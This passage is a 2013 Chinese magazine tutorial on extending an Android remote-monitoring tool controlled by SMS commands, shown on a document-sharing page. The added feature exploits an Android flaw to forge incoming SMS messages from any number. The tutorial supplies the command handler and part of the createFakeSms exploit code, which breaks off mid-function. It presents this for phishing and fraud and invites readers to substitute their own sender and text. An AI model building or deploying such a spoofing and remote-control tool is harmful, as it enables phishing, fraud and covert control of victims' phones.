- 1、本文档共3页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
2013 年第6 期
Android 远程监控系统设计之伪造短信
文/ 图 秦妮
通过前一篇文章,大家已经基本了解了远程监控的框架,在该框架上增加功能也是比较
简单的,添加的方法分为如下几步:添加权限、判断指令、指令功能实现。
本文将介绍一个20 12 年底北卡罗莱纳州立大学蒋旭宪教授领导的团队发布的Android
系统所有版本中存在的安全漏洞,任何应用软件不需要任何权限(包括不需要读写短信的权
限)都可以在系统中伪造任意号码发来的任何内容的短信或彩信,从而可能引发进一步的钓
鱼攻击。Google 已经确认了这一漏洞的存在。
这个漏洞的效果就是当程序运行时,可以在本机上伪造任意号码任意内容的短信,在钓
鱼和诈骗中比较常见。首先按照添加功能的方法进行代码编写,第一步是添加权限,该漏洞
不需要任何权限,因此这步可省。第二步判断指令,可在源代码中添加如下代码:
if(message.toLowerCase().contains(duanxin)){
createFakeSms (this.getApplicationContext(),10086,FakeSms);
}
这段代码的意思是,当接收到指令“QN#duanxin”时,调用createFakeSms 函数,
会在本机伪造一条收到来自10086 的短信,短信内容是“FakeSms”。这里可将要伪造的短
信号码及内容换成自己需要的。 处
第三步,指令功能实现。这一步比较简单,因为已经有大牛写好了利用代码,我们只要
线
稍加改动就可以拿来使用了,具体代码如下: 出
防
private static void createFakeSms(Context context, String sender, String
明
body) { 客
byte[] pdu = null; 注
byte[] scBytes = PhoneNumberUtils
黑.networkPortionToCalledPartyBCD (0000000000);
请
byte[] senderBytes = PhoneNumberUtils
.networkPortionToCalledPartyBCD (sender);
载
int lsmcs = scBytes.length;
byte[] dateBytes = new byte[7];
Calendar calendar = new GregorianCalendar();
转
dateBytes[0] = reverseByte ((byte) (calendar.get(Calendar.YEAR)));
dateBytes[1] = reverseByte ((byte) (calendar.get(Calendar.MONTH ) +
1));
dateBytes[2] = reverseByte ((byte)
(calendar.get(Calendar.DAY_OF_MONTH )));
dateBytes[3] = reverseByte ((byte)
(calendar.get(Calendar.HOUR_OF_DAY )));
dateBytes[4] = reverseByte ((byt
您可能关注的文档
- ASIN&DSIN-模拟输入控制方式说明-概述详解.PDF
- AXISP3301-V和P3304-V网络摄像机详解.PDF
- BDRack大数据实验一体机在郑州大学成功完成部署详解.PDF
- 2013年长宁县职高SMT制造实训室设备采购技术要求和商务方案.doc
- 4输入8输出数字音频处理器方案.doc
- Bitmap结构在高性能网络算法设计中的应用详解.PDF
- BMS_Design_Idea-电池管理系统(BMS)的设计理念详解.PDF
- THR150G二合一行为管理路由器方案.doc
- 北方工业大学设备及服务采购第二批方案.doc
- 东莞职业技术学院物流系慕课工作室设备采购项目方案.doc
- 2025版车库车位租赁与智能停车管理服务协议.docx
- 2025版车管所车辆抵押贷款及担保登记合同-@-1.docx
- 二零二五年度农村环境整治垃圾清运承包合同.docx
- 2025版财务制度保密及内部控制合同.docx
- 2025年辽宁省鞍山市单招职业倾向性测试题库精选.docx
- 2025年甘肃省陇南地区单招职业适应性测试题库及完整答案1套.docx
- 最新部编版二年级上册道德与法治期中测试卷附完整答案(夺冠系列).docx
- 2025年浙江工商职业技术学院单招职业倾向性测试题库审定版.docx
- 2025年广西水利电力职业技术学院单招职业适应性测试题库及答案1套.docx
- 部编版五年级下册道德与法治期末测试卷一套.docx
最近下载
- 2025年二建《建设工程施工管理》精选考点汇总.pdf VIP
- 出口扫描系列·变局篇:找寻出口商品的“稳定之星”.pdf VIP
- 开关站10kV开关柜检修试验标准化作业指导书1.pdf
- 2023年江西机电职业技术学院高职单招语文/数学/英语考试题库答案详解.docx
- 人教版高中数学必修五1.1.1《正弦定理》教学课件1 (共13张PPT).ppt VIP
- GB_T 15114-2023 铝合金压铸件.docx
- 2024年度组织生活会支部班子对照检查材料.doc VIP
- 5.1+人要自强+课件-+2024-2025学年统编版道德与法治七年级下册.pptx VIP
- 弱电系统维保方案(三篇).pdf VIP
- 义务教育劳动课程标准(2022年版).pdf
文档评论(0)